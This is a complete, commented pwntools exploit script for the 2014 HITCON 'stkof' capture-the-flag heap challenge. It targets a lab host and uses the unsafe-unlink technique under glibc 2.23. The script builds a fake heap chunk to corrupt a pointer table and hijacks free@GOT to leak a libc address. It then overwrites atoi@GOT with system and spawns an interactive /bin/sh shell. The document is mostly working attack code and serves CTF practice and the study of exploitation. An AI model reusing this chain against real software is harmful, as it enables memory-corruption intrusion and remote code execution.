
2014hitcon-stkof

unsafe unlink

from pwn import *

# --- target / environment setup ----------------------------------------
# Local alternatives kept for reference: run the binary under the matching
# glibc 2.23 loader.  The second line names a different binary
# (0ctfbabyheap) and looks like a leftover from another script.
#p = process(["/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64//ld-2.23.so","./stkof"],env={"LD_PRELOAD":"/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6"})
#p = process(["./0ctfbabyheap"],env={"LD_PRELOAD":"./libc6_2.23-0ubuntu11.2_amd64.so"})
# Remote lab instance; host and port are environment-specific.
p = remote('10.10.31.156',10011)
context.terminal = ['tmux','splitw','-h']
# Debug logging echoes every byte sent and received, including the raw
# leaked pointers read back later in the script.
context.log_level = "debug"
# Every offset used below (puts, system, the "/bin/sh" string) is read from
# this exact libc build; the remote must be running the same build for the
# computed addresses to be meaningful.
libc = ELF('/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
elf=ELF('./stkof')

def malloc(size):
    """Send menu option 1 (allocate) followed by the requested size.

    ``size`` is forwarded verbatim, so callers pass it already formatted
    (the script uses decimal strings such as "128").  Nothing is read
    back; the caller is responsible for draining the service's reply.
    """
    for line in ("1", size):
        p.sendline(line)
def write(chunk, size, strs):
    """Send menu option 2 (write) with its three arguments, one per line.

    ``chunk`` is the index of the target allocation as a string, ``size``
    the byte count as a string and ``strs`` the data itself (str or
    bytes; pwntools encodes str values).  No reply is consumed here.
    """
    request = ("2", chunk, size, strs)
    for line in request:
        p.sendline(line)
def free(chunk):
    """Send menu option 3 (free) for allocation index ``chunk`` (a string).

    Like the other helpers this only writes; it does not wait for "OK".
    """
    send = p.sendline
    send("3")
    send(chunk)
# --- stage 1: corrupt the heap so that free() performs an unlink --------
# Uncomment to attach a debugger when running against a local process.
#gdb.attach(p)
malloc("128") #chunk1: its table slot is reused for the leak below
malloc("128") #chunk2: the chunk whose contents are overflowed
malloc("128") #chunk3: the chunk that is freed to trigger consolidation
malloc("128") #chunk4: keeps chunk3 away from the top chunk

# Address the author names global_ptr; from the index-based write() calls
# below it is presumably the slot of the binary's chunk-pointer table that
# holds chunk2 (8 bytes per slot) -- not verifiable from this script alone.
global_ptr=0x602150
sizeofint=8
# 144 bytes written into a 128-byte chunk, i.e. 16 bytes past its end into
# chunk3's header.  Layout: a fake free chunk at the start of chunk2's data
# (prev_size 0, size 0x80) whose fd/bk point 24/16 bytes before global_ptr,
# so that fd->bk and bk->fd both read back the table slot itself and the
# unlink integrity check in this glibc passes; then filler; then chunk3's
# prev_size (0x80, reaching back to the fake chunk) and size 0x90 with the
# PREV_INUSE bit clear so chunk3 looks like it follows a free chunk.
write("2","144",p64(0)+p64(0x80)+p64(global_ptr-3*sizeofint)+p64(global_ptr-2*sizeofint)+b'a'*96+p64(0x80)+p64(0x90)) ##write past chunk2 into chunk3's header

# Freeing chunk3 consolidates backward and unlinks the fake chunk; the
# unlink writes a pointer near global_ptr into the table slot, so slot 2
# now points into the table itself instead of the heap.
free("3") #unlink
p.recvuntil('OK\n')
# --- stage 2: turn the table into a write-what-where on the GOT ---------
# Writing through slot 2 now overwrites the table: slots 0, 1 and 2 become
# the GOT entries of free, puts and atoi (the first 8 bytes are padding).
payload = 8*b'a' + p64(elf.got['free']) + p64(elf.got['puts']) + p64(elf.got['atoi'])
write("2",str(len(payload)),payload)
# Slot 0 -> free@GOT: make free() resolve to puts@PLT.
payload = p64(elf.plt['puts'])
write("0",str(len(payload)),payload)
# "free" slot 1, which now holds puts@GOT, so the redirected call prints
# the resolved address of puts.
free("1")
# Read up to the first 0x7f byte and take the preceding 6 bytes as the
# little-endian address; assumes the usual x86-64 user-space libc mapping
# (top byte 0x7f).  Subtracting the symbol offset gives the libc base.
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00"))-libc.symbols['puts']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))   # computed and printed only; unused below
system_addr = libc_base + libc.symbols['system']
print ("libc_base="+hex(libc_base))
print ("binsh_addr="+hex(binsh_addr))
print ("system_addr="+hex(system_addr))

# --- stage 3: slot 2 -> atoi@GOT: make atoi() resolve to system --------
# Every menu input goes through atoi, so the next line sent is passed to
# system.  NOTE: this whole chain depends on a writable GOT (no full
# RELRO) and on this glibc 2.23 build; it is the classic "unsafe unlink"
# case study, not something that transfers to hardened builds unchanged.
payload = p64(system_addr)
#print(payload)
write("2",str(len(payload)),payload)
p.sendafter('OK\n',"/bin/sh\n")
p.interactive()